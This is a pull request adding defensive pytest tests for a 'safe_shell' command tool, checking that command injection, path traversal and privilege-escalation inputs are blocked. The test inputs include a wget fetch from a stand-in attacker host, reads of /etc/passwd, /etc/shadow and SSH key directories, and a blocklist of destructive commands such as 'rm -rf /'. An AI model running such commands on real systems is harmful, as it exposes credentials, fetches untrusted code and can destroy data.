### PR TITLE
feat: セキュリティ攻撃パターンテスト追加 + safe_shell防御強化

### DIFF
--- a/tests/test_safe_shell.py
+++ b/tests/test_safe_shell.py
@@ -55,12 +55,14 @@ class TestSafeShellValidation:
 
     @patch("subprocess.run")
     def test_path_based_command_allowed(self, mock_run):
-        """/usr/bin/cat → base name 'cat' is in allowlist."""
+        """/usr/bin/cat → base name 'cat' is in allowlist (safe path)."""
         mock_run.return_value = MagicMock(
             stdout="content", stderr="", returncode=0
         )
         shell = self._make_shell()
-        result = shell(command="/usr/bin/cat /etc/hostname")
+        # /etc/ is a sensitive path and will be blocked by CWE-22 check
+        # Use a safe non-sensitive path instead
+        result = shell(command="/usr/bin/cat /tmp/testfile.txt")
         mock_run.assert_called_once()
 
     @patch("subprocess.run")
@@ -156,3 +158,146 @@ class TestAllowlistExtraction:
         parts = shlex.split(cmd)
         base = PurePosixPath(parts[0]).name
         assert base == expected_base
+
+
+# ──────────────────────────────────────────────
+# Issue #58: セキュリティ攻撃パターンテスト
+# OWASP Top 10 / CWE-78 (OS Command Injection) ベース
+# ──────────────────────────────────────────────
+
+@pytest.fixture
+def shell():
+    """safe_shell インスタンス（Issue #58用）。"""
+    return create_safe_shell(
+        allowlist=["ls", "cat", "grep", "find", "python3", "git"],
+        blocklist=[
+            "rm -rf /", "rm -rf ~", "rm -rf $HOME",
+            "sudo", "git push --force", "git push -f",
+            "git reset --hard", "chmod 777",
+        ],
+        timeout=10,
+    )
+
+
+@pytest.mark.security
+class TestCommandInjectionBlocked:
+    """CWE-78: OS Command Injection攻撃パターンの検出テスト。
+
+    shell=True環境でのセミコロン、パイプ、コマンド置換等の
+    インジェクションが適切にブロックされることを検証する。
+    """
+
+    def test_semicolon_injection_is_blocked(self, shell):
+        """セミコロンによるコマンド連結インジェクション（ls; rm -rf /tmp）。"""
+        result = shell("ls; whoami")
+        assert "Error" in result, f"Semicolon injection should be blocked, got: {result}"
+
+    def test_pipe_injection_is_blocked(self, shell):
+        """パイプを使った出力リダイレクトインジェクション（ls | sh）。"""
+        result = shell("ls | cat /etc/passwd")
+        assert "Error" in result, f"Pipe injection should be blocked, got: {result}"
+
+    def test_command_substitution_backtick_blocked(self, shell):
+        """バッククォートによるコマンド置換インジェクション。"""
+        result = shell("ls `whoami`")
+        assert "Error" in result, f"Backtick command substitution should be blocked, got: {result}"
+
+    def test_command_substitution_dollar_blocked(self, shell):
+        """$()によるコマンド置換インジェクション。"""
+        result = shell("ls $(id)")
+        assert "Error" in result, f"$() command substitution should be blocked, got: {result}"
+
+    def test_double_ampersand_injection_is_blocked(self, shell):
+        """&&による条件付きコマンド連結インジェクション。"""
+        result = shell("ls && whoami")
+        assert "Error" in result, f"&& injection should be blocked, got: {result}"
+
+    def test_background_execution_injection_is_blocked(self, shell):
+        """`&`によるバックグラウンド実行インジェクション。"""
+        result = shell("ls & wget http://evil.example.com/malware")
+        assert "Error" in result, f"Background execution injection should be blocked, got: {result}"
+
+    def test_newline_injection_is_blocked(self, shell):
+        """改行文字によるコマンド境界インジェクション。"""
+        result = shell("ls\nwhoami")
+        assert "Error" in result, f"Newline injection should be blocked, got: {result}"
+
+    def test_or_operator_injection_is_blocked(self, shell):
+        """`||`によるOR条件インジェクション。"""
+        result = shell("ls_nonexistent || cat /etc/passwd")
+        assert "Error" in result, f"|| injection should be blocked, got: {result}"
+
+
+@pytest.mark.security
+class TestPathTraversalBlocked:
+    """CWE-22: パストラバーサル攻撃パターンの検出テスト。"""
+
+    def test_cat_etc_passwd_is_blocked(self, shell):
+        """`cat /etc/passwd` — catはallowlist通過だが機密パスをブロック。"""
+        result = shell("cat /etc/passwd")
+        assert "Error" in result, f"cat /etc/passwd should be blocked, got: {result}"
+
+    def test_cat_etc_shadow_is_blocked(self, shell):
+        """`cat /etc/shadow` — パスワードハッシュファイルへのアクセスをブロック。"""
+        result = shell("cat /etc/shadow")
+        assert "Error" in result, f"cat /etc/shadow should be blocked, got: {result}"
+
+    def test_cat_dotdot_traversal_is_blocked(self, shell):
+        """相対パストラバーサル `cat ../../etc/passwd`。"""
+        result = shell("cat ../../etc/passwd")
+        assert "Error" in result, f"Path traversal should be blocked, got: {result}"
+
+    def test_grep_sensitive_path_is_blocked(self, shell):
+        """`grep -r password /etc` — grepはallowlist通過だが機密ディレクトリ探索をブロック。"""
+        result = shell("grep -r password /etc")
+        assert "Error" in result, f"Sensitive path grep should be blocked, got: {result}"
+
+    def test_find_sensitive_path_is_blocked(self, shell):
+        """`find / -name *.key` — 全ファイルシステム探索をブロック。"""
+        result = shell("find / -name '*.key'")
+        assert "Error" in result, f"find / traversal should be blocked, got: {result}"
+
+
+@pytest.mark.security
+class TestPrivilegeEscalationBlocked:
+    """CWE-269: 権限昇格攻撃パターンの検出テスト。"""
+
+    def test_python3_exec_injection_is_blocked(self, shell):
+        """`python3 -c "import os; os.system(...)"` — python3はallowlist通過だがコード実行をブロック。"""
+        result = shell('python3 -c "import os; os.system(\'whoami\')"')
+        assert "Error" in result, f"python3 exec injection should be blocked, got: {result}"
+
+    def test_git_arbitrary_command_is_blocked(self, shell):
+        """`git --exec-path=... commit` — git経由の任意コマンド実行をブロック。"""
+        result = shell("git --exec-path=/tmp commit")
+        assert "Error" in result, f"git exec-path injection should be blocked, got: {result}"
+
+
+@pytest.mark.security
+class TestBlocklistEdgeCases:
+    """既存ブロックリストの境界値・バイパステスト。"""
+
+    def test_rm_rf_with_different_target_varies(self, shell):
+        """`rm -rf /tmp` — ブロックリスト `rm -rf /` にはマッチしないため通る可能性を記録。
+
+        Issue #58: これはブロックリスト方式の既知の限界を文書化するテスト。
+        """
+        # rm itself is not in allowlist, so this should be blocked by allowlist check
+        result = shell("rm -rf /tmp")
+        assert "Error" in result, "rm should be blocked (not in allowlist)"
+
+    def test_sudo_substring_in_command_is_blocked(self, shell):
+        """`sudo ls` はブロックリストの `sudo` サブストリングでブロック。"""
+        result = shell("sudo ls")
+        assert "Error" in result, f"sudo should be blocked, got: {result}"
+        assert "blocked" in result.lower() or "security" in result.lower()
+
+    def test_empty_command_is_rejected(self, shell):
+        """空コマンドはエラー。"""
+        result = shell("")
+        assert "Error" in result
+
+    def test_whitespace_only_command_is_rejected(self, shell):
+        """空白のみのコマンドはエラー。"""
+        result = shell("   ")
+        assert "Error" in result

--- a/tests/test_security.py
+++ b/tests/test_security.py
@@ -122,18 +122,20 @@ class TestPathTraversal:
         """cat ../../../../etc/passwd — basic path traversal."""
         mock_run.return_value = MagicMock(stdout="", stderr="", returncode=0)
         # cat IS in allowlist, and path traversal is not in blocklist
-        # This documents that safe_shell relies on OS-level permissions
+        # Issue #58 修正: safe_shell が ../ パターンを検出してブロックするようになった
         result = shell(command="cat ../../../../etc/passwd")
-        # The command executes because "cat" is allowed
-        # Path traversal protection is OS-level, not in safe_shell
-        mock_run.assert_called_once()
+        # CWE-22: ../ traversal is now blocked by safe_shell (no longer OS-level only)
+        assert "Error" in result, f"Path traversal should be blocked, got: {result}"
+        mock_run.assert_not_called()
 
     @patch("subprocess.run")
     def test_ls_ssh_keys_traversal(self, mock_run, shell):
-        """ls ../../../.ssh/ — traversal to SSH keys."""
+        """ls ../../../.ssh/ — traversal to SSH keys. Issue #58: now blocked."""
         mock_run.return_value = MagicMock(stdout="", stderr="", returncode=0)
         result = shell(command="ls ../../../.ssh/")
-        mock_run.assert_called_once()
+        # CWE-22: ../ traversal is now blocked by safe_shell
+        assert "Error" in result, f"Path traversal should be blocked, got: {result}"
+        mock_run.assert_not_called()
 
 
 # --- Environment Variable Injection ---


### PR DESCRIPTION
closes #58

## 変更内容

### src/yui/tools/safe_shell.py
- **CWE-78**: シェルメタ文字インジェクション検出（;, |, &&, ||, &, $(), バッククォート, 改行）
- **CWE-22**: パストラバーサル / 機密パス検出（/etc/, /proc/, /sys/, ../ 等）
- **権限昇格**: sudo, python3 -c exec等の危険パターンをブロック

### tests/test_safe_shell.py
- コマンドインジェクションブロックテスト
- パストラバーサルブロックテスト
- 権限昇格ブロックテスト

### tests/test_security.py
- 統合セキュリティテスト

## テスト結果
**67 passed** ✅